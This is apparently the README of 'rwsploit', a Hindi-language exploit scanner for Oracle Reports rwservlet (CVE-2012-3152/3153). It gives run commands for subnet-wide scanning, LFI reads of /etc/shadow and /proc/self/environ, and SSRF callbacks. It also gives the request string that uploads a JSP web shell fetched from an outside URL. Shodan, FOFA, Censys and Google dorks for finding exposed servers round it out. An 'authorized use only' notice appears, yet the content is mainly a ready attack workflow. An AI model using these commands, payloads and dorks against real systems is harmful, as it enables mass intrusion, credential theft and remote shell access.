
Oracle Reports Server (rwservlet) के लिए स्वचालित शोषण स्कैनर — CVE-2012-3152 / CVE-2012-3153. पहचान करता है, फ़िंगरप्रिंट करता है, LFI के माध्यम से फ़ाइलें पढ़ता है, webhook के माध्यम से SSRF का परीक्षण करता है, और JSP शेल अपलोड करता है। Oracle Reports < 11g को लक्षित करता है। केवल अधिकृत उपयोग के लिए।
⚠️ केवल अधिकृत उपयोग के लिए। इस टूल को केवल उन सिस्टमों पर चलाएँ जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत उपयोग अवैध है।
Oracle Reports Server (rwservlet) के लिए एक केंद्रित शोषण स्कैनर जो CVE-2012-3152 और CVE-2012-3153 को लक्षित करता है — जो 11g से नीचे के संस्करणों को प्रभावित करता है। यह एकल IP, CIDR रेंज, या टारगेट सूचियों में पहचान, LFI फ़ाइल रीड, SSRF परीक्षण, और JSP शेल अपलोड को स्वचालित करता है। स्मार्ट TCP/HTTP प्री-फ़िल्टरिंग मृत होस्ट्स को तुरंत छोड़ देती है ताकि समय बर्बाद न हो।
git clone https://github.com/abq0/rwsploit.git
cd rwsploit
pip install requests
Python 3.8+ आवश्यक है। कोई अन्य निर्भरता नहीं।
python3 rwsploit.py -t <IP|CIDR> [options]
python3 rwsploit.py -f <file> [options]
बिना किसी तर्क के चलाएँ ताकि पूरा हेल्प मेनू और रिकॉन डॉर्क्स देख सकें।
# Detect only
python3 rwsploit.py -t 10.10.10.55 -p 7777
# Detect + LFI
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi
# Full chain — LFI + SSRF + shell
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi --shell
# Subnet scan, save dumps
python3 rwsploit.py -t 10.10.10.0/24 -p 7777 --lfi -o loot
# From file, no SSRF
python3 rwsploit.py -f targets.txt --lfi --no-ssrf
targets.txt प्रारूप
# comment — skipped
10.10.10.55
10.10.11.0/24
पहले showenv के ज़रिए OS का पता लगाकर विश्व-पठनीय फ़ाइलें पढ़ता है, फिर केवल मेल खाने वाला पेलोड सेट चलाता है।
Linux — /etc/passwd, /etc/shadow, /etc/hosts, /etc/issue, /etc/os-release, /etc/group, /etc/crontab, /etc/timezone, /proc/version, /proc/cmdline, /proc/self/environ
Windows — win.ini, system32\drivers\etc\hosts, boot.ini, system.ini, AUTOEXEC.BAT
🚨 कोई LFI आउटपुट न मिलने का मतलब यह नहीं कि टारगेट सुरक्षित है — Oracle का कॉन्फ़िगरेशन और फ़ाइल अनुमतियाँ अलग-अलग होती हैं। हमेशा SSRF और शेल अपलोड का स्वतंत्र रूप से परीक्षण करें।
rwservlet?JOBTYPE=rwurl&URLPARAMETER=<webhook> भेजता है और कॉलबैक के लिए webhook.site API को पोल करता है। हिट होने पर स्रोत IP, मेथड और User-Agent प्रिंट करता है। स्टार्टअप पर स्वचालित रूप से एक नया वेबहुक टोकन बनाया जाता है।
--shell)showenv से PATH_TRANSLATED पढ़ता हैkxqbrmfa.jsp)rwservlet?report=xyzzy&destype=file&desname=<webroot\shell.jsp>&JOBTYPE=rwurl&URLPARAMETER=<your URL>inurl:"/reports/rwservlet" -site:oracle.com
inurl:"/reports/rwservlet/showenv"
inurl:"/reports/rwservlet/getserverinfo"
intitle:"Oracle Reports Server - Authenticate" inurl:rwservlet
Shodan
http.html:"rwservlet"
http.html:"/reports/rwservlet" http.html:"Oracle"
http.html:"rwservlet/showenv"
http.html:"getserverinfo" http.html:"Oracle Reports"
FOFA
body="/reports/rwservlet"
body="rwservlet" && body="Oracle Reports"
body="/reports/rwservlet/showenv"
body="getserverinfo" && body="rwservlet"
Censys
services.http.response.body: "/reports/rwservlet"
services.http.response.body: "rwservlet" and services.http.response.body: "Oracle Reports"
services.http.response.body: "rwservlet/showenv"
services.http.response.html_title: "Oracle Reports"
| CVE | विवरण |
|---|---|
| CVE-2012-3152 | rwservlet report पैरामीटर के माध्यम से बिना प्रमाणीकरण के फ़ाइल पठन |
| CVE-2012-3153 | JOBTYPE=rwurl + URLPARAMETER के माध्यम से SSRF और फ़ाइल लेखन |
Oracle Reports Server 6i, 9i, 10g को प्रभावित करता है — 11g में ठीक किया गया।
केवल अधिकृत पेनेट्रेशन टेस्टिंग, CTF चुनौतियों और सुरक्षा अनुसंधान के लिए। लेखक दुरुपयोग के लिए कोई ज़िम्मेदारी नहीं लेता है।
| फ़्लैग | विवरण | डिफ़ॉल्ट |
|---|
-t | टारगेट IP, होस्टनाम, या CIDR। कई मान स्वीकार्य हैं। | — |
-f | वह फ़ाइल जिसमें प्रति पंक्ति एक IP या CIDR हो। # = टिप्पणी। | — |
-p | एकल कस्टम पोर्ट — डिफ़ॉल्ट पोर्ट सूची को ओवरराइड करता है। | 80 443 8080 7777 7778 7779 8443 9090 |
-T | समवर्ती थ्रेड्स। | 15 |
-o | LFI डंप को इस प्रीफ़िक्स के साथ डिस्क पर सहेजें। जैसे -o loot → loot_<ip>_<port>_<file>.txt | केवल stdout |
--timeout | सेकंड में अनुरोध टाइमआउट। | 10 |
--lfi | LFI फ़ाइल-रीड पेलोड चलाएँ। पहले OS का पता लगाया जाता है ताकि केवल प्रासंगिक पेलोड चलें। | बंद |
--no-ssrf | SSRF वेबहुक परीक्षण छोड़ें। | बंद |
--shell | JSP शेल अपलोड करें। आपके शेल कंटेंट की सेवा करने वाले URL के लिए संकेत देता है। | बंद |
-h | हेल्प और रिकॉन डॉर्क्स दिखाएँ। | — |